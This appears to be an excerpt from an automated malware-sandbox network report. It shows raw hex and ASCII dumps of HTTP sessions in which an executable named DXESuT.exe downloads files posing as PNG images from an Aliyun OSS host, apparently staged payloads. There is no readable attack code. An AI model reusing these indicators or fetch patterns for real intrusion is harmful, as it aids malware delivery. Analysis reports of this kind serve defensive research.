                                                                        Data Ascii: P~)%q'](=;*WEJ_2f@&B~N4yc[;LO(z^4Y.J:>0&Bog(SQprl'Lt=!Cj#-w3SzA8\-!.H~mYn`uT8.xX@7|z#`jWH"cdSE}
                                                                        2025-01-14 04:16:07 UTC4096INData Raw: a4 ce 1b 3f b1 95 f5 e2 f7 1d ca 9b a6 e3 de 50 05 be 4b 09 79 80 9f bf 28 8b a3 2d cb 60 1a cb 5a 62 c5 a8 6f 61 23 c0 ba 5a b4 ce 73 ac c3 10 36 06 7e cf 55 91 84 23 ca a4 7f 64 ad eb f9 42 d4 65 45 38 1d ea 85 58 ee 90 f7 c5 ad 82 1e aa ab ec 28 11 9d 08 75 8e 99 23 51 56 12 bb f2 ec a5 8c 71 52 30 12 8f b2 22 03 54 49 17 2d a9 e2 9b c9 d8 91 3d e6 4b e2 54 8d 20 7a 98 65 6a a6 80 f3 2a 47 63 e8 9e d3 10 a3 c1 d5 de 99 04 32 c0 6c 88 f1 2b 35 a2 46 f4 ea 5b 0c 34 6e c2 95 e5 52 f6 ef bc 63 f5 ff c0 ba b5 a1 61 b0 37 98 b5 8b 50 f2 b3 ff 86 a3 86 34 9d e1 d7 31 2c 2e d4 ae ca 03 9b 17 e1 5b 38 fa 2b a7 ee 18 ec bc f2 fd 26 d2 71 4e fc 6c a2 3d 51 f7 42 b0 e6 5d a8 9f 6b 56 d0 45 02 38 11 fc 1e e1 87 50 68 ee 1f 1e 4d f4 4c 09 27 ce 66 df b2 36 7a 52 e3
                                                                        Data Ascii: ?PKy(-`Zboa#Zs6~U#dBeE8X(u#QVqR0"TI-=KT zej*Gc2l+5F[4nRca7P41,.[8+&qNl=QB]kVE8PhML'f6zR
                                                                        2025-01-14 04:16:07 UTC4096INData Raw: 32 53 be f8 e1 2c e4 5a 11 81 f9 a6 d2 6c 61 df 95 a9 4b d9 2a 41 e6 db af 73 74 3b 57 6e 91 aa 58 48 2a 5b a7 c8 63 b7 00 5e a2 91 55 1a 3a 46 37 72 6b d2 88 c6 37 94 fe 9b 5e 56 8d f8 1e f8 77 1d b7 40 c1 be 7d 16 90 29 04 a9 bf ac 47 7f 75 1a 2a eb 90 a6 76 52 c9 79 a2 0c 24 a4 27 c4 8c a5 92 9d e1 b0 8d e9 4d 28 fe ef 9c 9a ae dc 09 4b 88 04 d5 64 46 5b 35 70 76 67 fa 4f b6 77 10 3e 6d 5c 26 99 f0 5e 70 41 47 4f 86 43 3c c2 e1 ff 6c 88 c0 0b c6 69 df 26 48 b4 ee 01 20 17 95 2d 58 53 25 ed 89 0f 86 5d c0 bd 8c b2 ea 67 ff 6e 0d 46 21 65 29 7c cc 51 2c f1 fc c6 5f 33 e1 c3 4c c3 56 b3 e0 db a9 96 fc aa b5 79 04 4b 76 8b 58 b6 c5 2d 21 24 53 ab b4 57 82 d7 1f 5b 9c 5e f4 72 cc 55 3a 7d b4 71 25 8d 23 80 46 c0 98 25 44 d1 1d df bc 03 70 90 76 34 3f fe c6
                                                                        Data Ascii: 2S,ZlaK*Ast;WnXH*[c^U:F7rk7^Vw@})Gu*vRy$'M(KdF[5pvgOw>m\&^pAGOC<li&H -XS%]gnF!e)|Q,_3LVyKvX-!$SW[^rU:}q%#F%Dpv4?
                                                                        2025-01-14 04:16:07 UTC4096INData Raw: b0 46 4a 18 a4 5b df a0 4c 0b a6 0f 91 d2 5e 2a 3f 0e 08 a1 76 13 8d bc eb 81 1b 98 ac 98 fd a6 92 2d 18 63 44 41 2b 6f 93 4a 90 b5 bd 55 f9 9e c0 fd 0b 40 c4 20 4e c8 a3 7d 18 f8 03 b9 16 a2 7d f0 5b dc 69 1f 83 bd a0 a8 db c6 6b ad 9f fe 4b 55 02 16 dc 81 1b 3a 30 2d 16 27 93 38 3a 3f ca 2d 56 13 69 ff 3e 2c 74 e7 e2 e7 b9 9a 3c 24 2c f7 68 99 b1 ff 55 a4 31 a9 92 b9 7b ff 07 73 b6 80 63 50 79 5d a3 82 b8 d9 83 b7 bb 5f 8f 88 0b 5f 11 61 a7 45 20 e5 f8 37 ed c3 fd 2e 12 cb c5 f6 bb 01 a7 ce 60 88 e4 54 b4 14 eb dd f0 5e 0e 71 96 29 ce 6e cf fb 11 49 0d 5f 56 be a6 37 e1 4e b0 be 1c 3b ef 00 3b f5 fd 09 69 ce 43 dc 42 84 d7 a6 5d 9a cb 0a 96 74 e4 b2 10 81 67 b8 03 84 89 ff 87 ea 89 5c b6 37 b6 f9 3d 49 d1 e0 12 59 10 77 ca 12 73 9f c0 20 54 3d 92 47 b3
                                                                        Data Ascii: FJ[L^*?v-cDA+oJU@ N}}[ikKU:0-'8:?-Vi>,t<$,hU1{scPy]__aE 7.`T^q)nI_V7N;;iCB]tg\7=IYws T=G


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        14192.168.11.2049771118.178.60.1034432236C:\Program Files (x86)\DXESuT\DXESuT.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-14 04:16:10 UTC127OUTGET /dsb-hr2.png HTTP/1.1
                                                                        User-Agent: Chrome/114.0.0.0
                                                                        Host: upitem.oss-cn-hangzhou.aliyuncs.com
                                                                        Cache-Control: no-cache
                                                                        2025-01-14 04:16:10 UTC544INHTTP/1.1 200 OK
                                                                        Server: AliyunOSS
                                                                        Date: Tue, 14 Jan 2025 04:16:10 GMT
                                                                        Content-Type: image/png
                                                                        Content-Length: 57536
                                                                        Connection: close
                                                                        x-oss-request-id: 6785E50A07D4B93434A90BB7
                                                                        Accept-Ranges: bytes
                                                                        ETag: "9E285C23C9DA187B313051DD6FEB4266"
                                                                        Last-Modified: Fri, 22 Mar 2024 09:16:17 GMT
                                                                        x-oss-object-type: Normal
                                                                        x-oss-hash-crc64ecma: 2580453812540855072
                                                                        x-oss-storage-class: Standard
                                                                        x-oss-ec: 0048-00000105
                                                                        Content-Disposition: attachment
                                                                        x-oss-force-download: true
                                                                        Content-MD5: nihcI8naGHsxMFHdb+tCZg==
                                                                        x-oss-server-time: 7
                                                                        2025-01-14 04:16:10 UTC3552INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 54 00 00 02 c0 08 06 00 00 00 76 4e 6b 38 00 00 20 00 49 44 41 54 78 9c 9c fd 0b 96 ec ba 0a 2d 0a 8a bc bd a8 46 57 7b aa 2d af 2f 37 f8 b3 d1 4e bf 8d 41 ac 7f c6 ab ba 6d bd da 8e f1 7d ef 1a ce 4e 84 d6 b6 6a dd 91 e4 21 da 72 92 f0 7d 6a 8f 11 5b e0 04 fa 4d d4 61 15 b7 2f ea 17 a3 dd 1b 32 8a 47 49 5c 28 3b 5b 4b 08 39 62 1a a3 27 c9 09 8d 31 ad 47 eb 82 90 50 c5 cf 98 f3 27 3d 64 f6 3b 33 dc 51 8b 51 78 38 38 70 7a b5 26 d2 3a 9b d7 ca 3b cb bc 44 c7 0b 0e 59 fd 4d 60 a7 98 14 ff 07 06 26 ba 2a b2 a1 11 e1 a2 9c d3 7a bb 02 b9 c8 59 52 03 8e 3c 34 cd 27 c0 32 4a d7 55 0c ac 7a a0 71 ee d8 ee b0 d3 b6 11 21 10 a8 fc a0 a8 32 82 6a e9 da 11 a2 11 e6 ae dd 3b 0e 09 4d 30 13 c2 38 64 d8 39 69 de
                                                                        Data Ascii: PNGIHDRTvNk8 IDATx-FW{-/7NAm}Nj!r}j[Ma/2GI\(;[K9b'1GP'=d;3QQx88pz&:;DYM`&*zYR<4'2JUzq!2j;M08d9i
                                                                        2025-01-14 04:16:10 UTC4096INData Raw: 0a d7 92 25 eb f9 09 1a e6 06 e2 9d 48 ac 4a c2 fa 01 eb 5e 5e a4 6b a9 d7 b6 e4 c4 87 c9 a2 a1 1a a8 27 67 36 a6 e1 29 a9 30 2a 4d 98 5d 7e d7 8d 82 01 77 55 e0 15 6b e6 89 43 42 f6 1e 35 e1 22 ad 9e 81 39 14 ec 9c 69 10 31 16 ae d2 7e 19 03 13 b4 89 67 8a 65 0e e4 3b c5 b0 b9 3e 67 26 30 aa 16 2b 6e 02 c4 a8 82 61 18 b7 6f 1e ef f1 23 b8 3e 98 a9 1f e8 b6 9a 83 04 e2 8a b6 ae 85 3b c3 83 8e 0d e4 3e 01 bd 0c 8f b1 3f d4 99 3e 3d e6 fa f7 cc 9b d0 d5 6d 24 67 f1 aa 30 4e e8 32 54 84 f7 0c 89 48 37 e2 5b f4 f8 d4 82 d7 3a 07 c5 1a b2 15 cf d0 dc 23 73 39 1e 63 9e ea 64 37 b0 e5 d5 58 7c c7 3b 45 49 46 63 44 6c 3e 40 6d 3a 64 17 ea 4c 04 19 b6 49 d6 5a 49 95 a8 74 9c 35 a3 77 4e b0 d3 ea 28 8e 9a 2f dc e2 28 e5 6d e7 05 06 3d 82 7e 6f 1f df 64 22 c2 99 61
                                                                        Data Ascii: %HJ^^k'g6)0*M]~wUkCB5"9i1~ge;>g&0+nao#>;>?>=m$g0N2TH7[:#s9cd7X|;EIFcDl>@m:dLIZIt5wN(/(m=~od"a
                                                                        2025-01-14 04:16:10 UTC4096INData Raw: 26 a6 8e 04 d0 06 2c c8 a5 50 da f8 ab 10 86 d2 79 17 49 c6 1c ae fb 87 17 a8 2b 09 77 77 a4 7c b3 b8 24 b1 d2 67 15 00 57 0c 66 9d 13 cc 50 30 82 54 4a 87 18 13 5a 6d 9d ab 52 d4 a7 ae f9 8c 19 47 58 51 d3 b3 b2 32 3e c4 6a c5 85 bd f7 41 ef e1 1b f9 e7 3c 28 66 30 aa a0 45 0e 98 7e 4b 9c ec f1 8f 5b c9 8d 91 9f f6 14 6c 97 f3 87 18 74 46 86 9a 01 a8 a1 b2 ee 20 32 39 a6 cd d1 be 2f ee ae f8 e3 a6 f9 eb 3e 5e 8c 1b cc 3c 51 e0 ee 67 4b 74 d1 67 fe 93 dd 51 99 9d 36 b7 3f 56 db 72 22 20 30 5f 85 bb 6b a8 ad 43 39 c1 53 72 ac e2 fe bc ab 48 33 af c8 d4 73 29 a7 66 52 d0 d8 f9 ea 6b 99 62 73 74 81 42 de 38 e5 fa 79 88 b6 cb ca 9c 56 cc 19 95 95 ac 62 77 7f 60 92 12 d7 be 73 aa e1 f0 df 96 e2 05 63 6d da cb 44 47 72 47 53 5a f3 0e 97 45 27 48 70 a1 ed 31 17
                                                                        Data Ascii: &,PyI+ww|$gWfP0TJZmRGXQ2>jA<(f0E~K[ltF 29/>^<QgKtgQ6?Vr" 0_kC9SrH3s)fRkbstB8yVbw`scmDGrGSZE'Hp1
                                                                        2025-01-14 04:16:10 UTC4096INData Raw: 17 e8 c1 cb 76 16 dc 71 70 3c c4 26 0f d2 f8 c5 94 b7 99 09 9e 5f 35 2e 94 4e d6 6b 76 b6 f8 a8 fc b3 99 df 1c 31 c0 ab 2c 14 e6 a1 61 99 3d 37 06 ba 84 33 13 7d 2f 30 ec 72 08 35 3e 54 27 79 13 d2 c4 f7 78 d9 d0 f1 80 d6 ee 5d 4b fd 3f 0c 3f e3 d1 d5 f7 68 d8 10 d0 c2 29 cd 8b 22 34 1e 83 d1 a1 e4 61 ed 10 6e 44 db 31 a4 9e 14 31 b4 c5 8a 48 b2 09 5a 4d d0 8f 69 bf b4 00 76 73 f4 e4 0b 20 d8 72 b8 38 8b c6 bd dc aa b0 21 5a bf 9b b6 5e 50 39 92 04 35 27 4b e8 9e 7c a9 90 51 40 41 52 5d 2e 14 50 5c 84 8c 5f f0 29 79 c1 24 54 d3 25 e3 a9 c2 65 3c 84 2c 1b 90 e5 5c 34 d0 4d 1f 59 f7 f8 ab 25 da a8 33 39 6a ea 78 87 82 71 55 91 65 42 99 19 65 db 99 70 58 5f 6a d5 6b c3 26 70 df cd 87 dd 2b 2f 73 e7 94 93 a1 22 41 cd 62 1f 4b 74 ca 3a 2b d5 cb cb 49 e6 20 f9
                                                                        Data Ascii: vqp<&_5.Nkv1,a=73}/0r5>T'yx]K??h)"4anD11HZMivs r8!Z^P95'K|Q@AR].P\_)y$T%e<,\4MY%39jxqUeBepX_jk&p+/s"AbKt:+I
                                                                        2025-01-14 04:16:10 UTC4096INData Raw: 52 fb c1 10 6c a6 dd 2d 6d bb 5a 8c 69 09 52 d4 3d 29 a0 af e0 8b fa 3e 0f 57 40 7a 42 21 7e 74 e2 46 c4 c1 93 69 e4 85 56 ca 8c dc a2 76 17 25 39 4f a3 b0 d6 bf 88 6c ad 3b 6a d2 43 1c db 98 7c 85 b3 f7 d2 b6 87 3d f2 27 ad c3 6c cf bf a9 52 71 4a e9 19 d4 68 00 44 4d 63 87 a9 a2 0c f4 37 bc a5 e4 9c c0 f5 59 eb 23 ec 54 80 e7 cd c4 11 c3 a1 19 70 53 05 89 50 d7 b3 75 19 3b f1 ec 7c f7 97 aa 02 7c 73 74 3f 2a c9 16 27 83 11 37 b9 3b a6 95 8b 0b 21 9d b4 ad c6 2a 56 32 46 2c a2 f6 df b1 cd 28 a0 bb 18 56 1b c5 69 85 5c e3 dc 57 ba 61 87 3c c8 c2 f4 76 12 64 84 c0 73 97 56 8c 48 f8 64 aa 26 2a 0c 54 12 80 50 67 3e f7 be ed ed d3 70 bd bc 9a 4e 65 1a c6 23 7c 7e 7e 42 91 53 57 7a ec 7c ea 1e e6 2a df e4 4e 85 68 86 f7 f1 22 61 52 e7 89 6d c9 76 e8 fe 45 c3
                                                                        Data Ascii: Rl-mZiR=)>W@zB!~tFiVv%9Ol;jC|='lRqJhDMc7Y#TpSPu;||st?*'7;!*V2F,(Vi\Wa<vdsVHd&*TPg>pNe#|~~BSWz|*Nh"aRmvE
                                                                        2025-01-14 04:16:10 UTC4096INData Raw: f5 31 70 b2 09 80 f5 03 e5 56 7d fb e1 36 f4 41 34 c3 66 51 03 9c 32 dd a5 4c 32 8e f5 99 cc bf 81 ba c1 78 fb 95 a7 cd 47 a6 12 b2 91 2f 81 53 56 38 8e 30 86 89 ed 0d d3 1e d1 11 73 1b e9 7e 28 61 76 3e 44 e0 2c ca 42 54 38 fa a4 69 53 dc b2 00 9c f3 e8 1d e0 e2 bc ac 3a db cd 35 d6 da 63 1e 96 63 9e a0 b2 1f 26 43 c6 e4 1f 21 3d a0 83 7b 6e 88 72 36 4c b3 32 66 f1 0c a4 b6 64 4b 88 99 2e 11 fa 6c e5 da d3 5a 78 c9 83 08 2f 40 73 a7 a4 d4 5e 26 5e 11 60 94 40 93 83 6e de ff 5d d9 cd e7 15 cf 5d 84 7e 21 de 29 60 51 e8 b6 c7 0a 75 db b3 73 e9 24 2a a3 d1 53 5f 7e ce 3c b3 9e 62 ab 5e 7b 10 ee c6 de 59 2c 61 4e 44 0e b7 04 f7 24 0a 62 09 68 ba f8 e7 28 ae 77 3c 96 da 38 22 54 76 f9 8f ef 0b ac a3 08 c7 1c 6f ca 34 c0 c2 55 5c 44 c7 43 01 20 03 c4 3b 77 06
                                                                        Data Ascii: 1pV}6A4fQ2L2xG/SV80s~(av>D,BT8iS:5cc&C!={nr6L2fdK.lZx/@s^&^`@n]]~!)`Qus$*S_~<b^{Y,aND$bh(w<8"Tvo4U\DC ;w
                                                                        2025-01-14 04:16:10 UTC4096INData Raw: 90 6b e4 2c bd d7 53 84 08 52 cd 3f 7d 50 02 52 cb 5c 84 93 fa 52 b9 03 71 75 a2 df 12 0d 22 11 8c d0 85 1c 37 5a fb 7b 32 b8 ea ac 12 0d b9 ee 5f 50 b0 26 c2 06 4e b3 11 89 90 ae a0 a2 a2 c3 2b fa f5 ae 0c 24 a1 43 e5 ac 44 f4 db cd 81 fa 54 84 df c0 85 15 54 3b 5b bf bb 52 90 b7 01 1b 9e 12 a4 44 4c b3 12 86 c6 c7 f7 59 14 79 c6 c3 19 4a 4b 2a c2 1e 60 33 a2 62 e7 11 20 ef 67 94 6a 50 21 93 7c db 89 7d 41 df 08 6f 56 77 e3 65 ea a1 ae ee 30 46 93 36 b7 09 ad c3 22 9e 7d a9 76 1a b4 b1 47 87 d3 0a 1c e5 45 5d f6 1c 29 de fa 4b 22 43 b2 5b b3 fd 30 45 0b a9 7c 28 af aa 88 e7 c4 0f e9 13 ad 03 06 05 2a ba af dc 71 9e 8b 3e ab 50 d2 c2 01 a9 d3 78 45 e1 6d 3d 9a f5 dd fb e3 1e fa c8 ee 54 bc fb 5f 5e 2c eb 03 6a 61 ca 7c 40 78 76 97 f5 15 4a 6b 0f f2 f7 c1
                                                                        Data Ascii: k,SR?}PR\Rqu"7Z{2_P&N+$CDTT;[RDLYyJK*`3b gjP!|}AoVwe0F6"}vGE])K"C[0E|(*q>PxEm=T_^,ja|@xvJk
                                                                        2025-01-14 04:16:10 UTC4096INData Raw: 82 d5 1e 5f ed 61 54 e7 73 08 f9 2f 0c b3 0c b5 0b 7e c5 94 13 a2 6c 60 0e ef de 4b 8c ce 53 41 5d 66 66 5d 73 0f ec 3d ed ec d6 e8 3a fc c3 10 53 4c e2 83 81 b2 ed a7 c3 66 a0 59 24 aa 4d 11 46 1b a1 64 a0 19 2a 7d 40 df 58 9c 77 65 17 f9 3c 7d 1f 71 24 a1 d7 09 c5 0b 4e 06 82 24 4e 61 59 12 b4 23 3d 4d b8 97 1e 57 d6 ab 8a 37 4e 85 d4 3f 01 bd 6b c6 d7 e2 fd 31 7c 6d 65 3e 45 b4 96 5e 1a b7 24 f2 98 22 ce a0 6c b5 ec 90 07 f5 f1 f4 08 1a 9c 85 75 f7 bd 56 75 7e a0 38 d8 c6 48 6c 70 15 4b d2 f2 56 94 04 74 a4 89 a0 f9 1d 2e 32 e0 fd c0 ad 8e 14 df f4 78 f7 b2 d8 7d dc 9e ec b0 06 2e 61 cd 86 b7 c7 09 3c 2a 95 3b 2f 13 35 67 36 a0 2e c1 0a 39 b6 a1 dd 56 c9 bb 8c 41 a5 c9 88 ad a9 d2 e5 e0 2a 52 7b 45 b0 59 43 4a 98 a7 e1 c4 0d 18 2f 0e 57 ba 34 dc 1d f6
                                                                        Data Ascii: _aTs/~l`KSA]ff]s=:SLfY$MFd*}@Xwe<}q$N$NaY#=MW7N?k1|me>E^$"luVu~8HlpKVt.2x}.a<*;/5g6.9VA*R{EYCJ/W4
                                                                        2025-01-14 04:16:10 UTC4096INData Raw: 1b 21 35 61 1a 11 18 6e 7b 42 20 36 0b 12 58 8d 23 ff 35 3e fa 04 7f 02 4d 67 99 7c b3 ea 88 f5 fc f1 32 c1 f2 c5 66 16 c6 e3 d2 86 d2 aa 3e f6 eb 9d 27 0d 12 be a1 9b ca 73 a8 54 4b ea cf 9d 5e 08 47 c3 6e 8a 4b 41 db b2 4d 19 c2 78 6a b0 c1 e1 30 57 40 11 d0 1f 6b ef c2 75 65 d0 c9 83 7d 3c c9 bb e6 85 fe d5 09 45 5b bd 5a fd 86 40 5b a6 d9 89 19 99 b8 6d eb d0 4e 4a 43 64 3d 0e 1d 9c de 9a 59 4a fe 08 c2 47 1f ad 17 31 a0 4e ec 12 b3 17 94 35 ed 86 87 0d c7 b8 9d a0 0f aa 3e 5d f7 ff 09 0e 60 30 0a 12 e4 3b 53 41 9c 09 07 ba 8b 74 56 3f 66 d0 ee 20 a7 03 ce 4c 5d e5 ff 34 a5 69 e8 17 e3 7d 1f 51 3d 0d 18 b6 99 6b c1 4e 72 9e e5 db ed 7c a6 73 4a 5d 5a 54 77 d4 06 76 d5 b1 69 54 26 e1 e4 0d b8 3f 27 86 5d 9c fa 50 d0 9f 38 8d 82 2b b4 8a b5 fd c7 54 fe
                                                                        Data Ascii: !5an{B 6X#5>Mg|2f>'sTK^GnKAMxj0W@kue}<E[Z@[mNJCd=YJG1N5>]`0;SAtV?f L]4i}Q=kNr|sJ]ZTwviT&?']P8+T
                                                                        2025-01-14 04:16:10 UTC4096INData Raw: 66 0d be 2a cd 0a 6b c5 13 7e 2c 10 4a 5e 67 dd 43 bd e2 87 d0 82 c3 40 7e 1b bd 21 4a 2e 2e 9a 83 5a 43 e9 94 18 6b b9 c7 2a 66 6e f4 09 89 34 0e db cb fd f5 7b bd 63 39 c1 b7 7f de d1 72 b3 b5 1f 7b d6 e3 a5 95 65 b3 c8 de 7d 85 60 c8 88 d0 2b da ba 73 f2 47 be 6f ee 94 ee ae 58 26 81 f0 e4 4f dd 3e 1e 76 b2 76 9a 6e b1 7d e2 92 a9 bc 6a 96 44 e3 04 e3 94 54 64 28 7d 87 58 54 b3 a1 68 5a 1d 66 8c 3a 89 ff 5f 78 9b 58 e4 b5 68 27 63 3d 16 2f 7a 2f e5 d0 33 76 60 5a 44 19 8a 55 e3 f0 43 12 6f 0a 56 80 5a 15 96 13 8f 9c 41 ee 8d 09 b3 42 e2 76 86 f6 70 cf 0b 29 67 00 66 2e 92 0d 2c 91 d8 c2 89 37 e5 ac 9f 46 e8 49 0f f5 d8 09 c8 41 5e 26 1a b3 c6 93 49 2b 0b 1d b7 ed 44 38 5a ee d5 5b d4 be 36 25 d5 d5 47 f7 22 62 d6 eb 68 22 06 73 c9 d2 4b e7 82 57 43 0b
                                                                        Data Ascii: f*k~,J^gC@~!J..ZCk*fn4{c9r{e}`+sGoX&O>vvn}jDTd(}XThZf:_xXh'c=/z/3v`ZDUCoVZABvp)gf.,7FIA^&I+D8Z[6%G"bh"sKWC


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        15192.168.11.2049773118.178.60.1034432236C:\Program Files (x86)\DXESuT\DXESuT.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-14 04:18:08 UTC127OUTGET /dsb-hr3.png HTTP/1.1
                                                                        User-Agent: Chrome/114.0.0.0
                                                                        Host: upitem.oss-cn-hangzhou.aliyuncs.com
                                                                        Cache-Control: no-cache
                                                                        2025-01-14 04:18:08 UTC545INHTTP/1.1 200 OK
                                                                        Server: AliyunOSS
                                                                        Date: Tue, 14 Jan 2025 04:18:08 GMT
                                                                        Content-Type: image/png
                                                                        Content-Length: 357504
                                                                        Connection: close
                                                                        x-oss-request-id: 6785E5806F8C26303733A689
                                                                        Accept-Ranges: bytes
                                                                        ETag: "2977911419E268860C5E85E967E5C13E"
                                                                        Last-Modified: Sat, 13 Jul 2024 15:18:19 GMT
                                                                        x-oss-object-type: Normal
                                                                        x-oss-hash-crc64ecma: 9585452185678011734
                                                                        x-oss-storage-class: Standard
                                                                        x-oss-ec: 0048-00000105
                                                                        Content-Disposition: attachment
                                                                        x-oss-force-download: true
                                                                        Content-MD5: KXeRFBniaIYMXoXpZ+XBPg==
                                                                        x-oss-server-time: 7
                                                                        2025-01-14 04:18:08 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 54 00 00 02 c0 08 06 00 00 00 76 4e 6b 38 00 00 20 00 49 44 41 54 78 9c 9c fd 0b 96 ec ba 0a 2d 0a 8a bc bd a8 46 57 7b aa 2d af 2f 37 21 a8 9c 0d a6 87 5a a6 77 c6 f9 24 18 ad d2 a2 7f c3 44 ba ce 4e 6c 76 be 69 d8 91 e4 6a f0 7f 34 a0 3a 9b 21 8c 09 48 40 89 3e 33 93 fe c7 44 ab 77 84 ce 30 0a 4c 1b f1 96 c9 bb 57 fc 05 46 f8 0f 79 12 8a 88 68 72 3e ee 57 df 71 ba 6a b8 79 58 0c cb 9c 90 eb bb 4e fb 09 13 4e 79 98 6c f7 73 16 1f d2 7e a1 c5 26 33 08 50 ac ac 8d 66 ff 34 3f cf 26 ba 23 50 10 1f c3 3c e3 e2 b9 79 22 d7 15 78 b3 d2 c4 66 02 62 ae 4a 53 dd ea ce e4 14 49 3f 98 17 08 73 f4 7d 54 45 32 9c 41 06 71 ce fd 4f 2a 6b 49 10 c2 50 bd 4d ab 68 c3 fb ea 41 3d 97 d8 a7 56 39 05 d5 05 a3 e9 41 88
                                                                        Data Ascii: PNGIHDRTvNk8 IDATx-FW{-/7!Zw$DNlvij4:!H@>3Dw0LWFyhr>WqjyXNNyls~&3Pf4?&#P<y"xfbJSI?s}TE2AqO*kIPMhA=V9A
                                                                        2025-01-14 04:18:08 UTC4096INData Raw: 8c 62 15 f5 0e 67 83 25 70 72 63 6c ce f2 f7 5a 9f 27 80 5c 92 c4 16 a6 f4 12 6f 67 16 f1 c5 5b 9d ea 1b ed db 9e 58 10 8b 30 a5 0f c2 07 fe 09 01 09 ba af fa 7f 0b b6 d8 c2 4d 9d 48 b2 95 4d 18 28 4d 33 93 85 bc 89 9b 9b 19 b7 3b ae 2f 1d 04 60 03 9d 19 fa 37 21 f4 0d ea 17 d3 f1 47 6a 53 0a 2f 09 33 e3 e0 f4 9a 2e 8f ed 53 08 4e 13 50 06 7e 5c 77 07 8e da d6 56 26 7c a0 d3 d9 c5 ac 3b ed ab f2 24 44 bd 53 f4 87 d3 c5 53 77 08 3d 8e bd dc 4e 37 51 b4 94 2d 03 ef 98 a7 54 f7 1b a8 c5 f8 f1 e1 c3 e6 1d 13 c1 8d b4 93 ac 3f d5 18 da 1b 14 36 96 d3 41 8a 29 28 55 19 27 b6 04 cf 25 1e c2 28 2e e0 ac d1 c4 79 b5 c3 09 35 f8 49 b8 7a 39 d9 83 68 5c 23 7f 2d 9e bc a5 75 9c ce 20 b8 ba 03 26 ae 37 3c 95 e2 73 fe 99 b6 38 c3 58 bb d1 09 1c 70 7c 1f 47 b8 cc ec b7
                                                                        Data Ascii: bg%prclZ'\og[X0MHM(M3;/`7!GjS/3.SNP~\wV&|;$DSSw=N7Q-T?6A)(U'%(.y5Iz9h\#-u &7<s8Xp|G
                                                                        2025-01-14 04:18:08 UTC4096INData Raw: f8 0d 1a ed d7 20 cc b6 ea a7 ef bf 12 e0 fb 20 6a 4d 3d 7b d8 bf 8a 25 40 9b 9e 91 c2 15 44 17 2a 9f 19 07 b9 f4 3a ca ac 73 ca a6 b0 5d f6 24 5b eb 02 43 93 df d9 be b4 a4 1a 5e 2d 00 e5 c2 54 9a 4d 73 87 79 a7 ed 01 4b 8d ff 65 b7 dd 49 e0 8d ef 9a 81 cc a3 5a b6 75 0e b0 f1 c5 16 3f 56 b9 06 7f c5 00 f6 3e 7f da 08 db f2 46 91 8e 70 49 f6 20 05 5c 0b e0 4d 9e 50 24 29 a4 13 44 28 77 51 13 78 dc 5a 73 ff 6c 51 65 46 b0 f6 ed b0 f3 be a1 c9 9b 83 95 5c 97 d2 da 5d a1 00 79 53 77 9b cc 90 b9 90 25 38 c8 3e 8b f9 a8 40 bc 38 9a 67 69 51 ef 40 00 49 f7 39 aa 1f 54 ff 23 f3 b8 10 10 d1 90 1c 69 92 f1 04 f7 3c 76 a6 32 03 d8 39 36 b8 5f 6b 36 4b f9 1e 29 7e 8f 8e 1f 29 08 5d 03 a0 43 50 37 ca 71 cd 09 21 ce 8e 09 e9 13 85 51 57 dc e0 cb 9f dd a2 08 d6 85 3a
                                                                        Data Ascii: jM={%@D*:s]$[C^-TMsyKeIZu?V>FpI \MP$)D(wQxZslQeF\]ySw%8>@8giQ@I9T#i<v296_k6K)~)]CP7q!QW:
                                                                        2025-01-14 04:18:08 UTC4096INData Raw: cf 4f 41 8f a8 a5 3d c1 e5 8c b1 22 26 ca 3c 3c a7 cf 01 91 58 fd 57 ff ed d8 b7 45 67 01 13 b6 86 13 86 01 90 75 51 1e 4c 70 ce fd 2f 1a 63 c3 52 c6 9d 4c d1 ef 2d db 26 30 b5 36 b6 07 12 1e 14 e7 fd 90 f5 e6 f0 6a 58 46 73 59 05 38 ff a2 d2 fb 11 77 7f 8b f0 e2 08 b0 49 0e 96 00 f4 99 09 cd 5f 10 18 83 59 5d 68 f1 84 c2 09 d7 1a ca fe c5 03 4a b8 24 56 2c ae 54 76 a5 d6 cb c3 c4 d4 2f fe 29 67 08 06 b5 e8 2a f5 76 1d e6 08 91 59 53 03 62 b8 05 c9 04 4c ec 51 ea e7 64 08 85 a0 ad 54 f4 f1 6d 0c fa b7 26 48 49 80 e2 ef c7 bc e2 df e6 42 91 9f 36 66 86 82 a9 09 f3 3b a6 bf ff 58 7a d8 de ad d3 0a 52 1c 8e 55 6d d3 b7 63 bc e6 a8 c9 19 b4 26 09 47 04 58 b2 ca 91 76 29 77 25 8b 48 cd a8 7e 20 a2 24 6e df 76 39 4c 3b d9 2d ae 31 82 99 5b 8f c7 bb f7 c5 c8 5b
                                                                        Data Ascii: OA="&<<XWEguQLp/cRL-&06jXFsY8wI_Y]hJ$V,Tv/)g*vYSbLQdTm&HIB6f;XzRUmc&GXv)w%H~ $nv9L;-1[[
                                                                        2025-01-14 04:18:08 UTC4096INData Raw: 20 d7 e6 4b d8 d6 ff a7 39 9e d4 ea 4c 2b 99 c5 2f 7b a7 6d db 13 3a 0b 23 1a fb 9c c1 a3 d8 19 5b b9 2e a0 f1 ac b0 be 60 bc ee a3 07 51 89 b5 f2 9a e6 a9 02 99 2d 41 2a 1b ba b8 bc ac 10 35 86 7b 47 b0 b8 79 1e d7 f6 c0 b8 10 45 85 c8 80 51 8a 9f 16 a1 f3 aa 1f 36 63 f1 d7 d7 3b 63 d9 a7 8f 57 cf 3f 6a a7 26 22 bd ee 1f 7d a0 ae be bc 84 2b 91 26 59 bb f3 9c 64 2c df 8b 18 42 33 06 f4 1c 71 53 34 9d 75 d8 12 9f 3a 0a 78 36 24 2b 85 2d ff bf 91 6b a6 dd 0a 3c b8 61 b0 43 ef 39 d3 6c ac 8a 2a dc 61 8b 83 3f 67 ea 7b d2 65 18 1d 2f bc 27 d6 7b 0c eb be a3 a1 3f 87 78 7e 5c 6b 86 c9 90 aa 73 7b da f1 6e 5d 5e 32 48 bf d5 ac 64 c9 9f 75 d9 0d b2 b0 21 69 7b ae 16 80 9f c4 36 37 36 3b f3 95 14 ba e1 e3 e2 cc bf b8 6a 80 93 13 ca ac 30 f1 2e 87 60 f1 e5 37 37
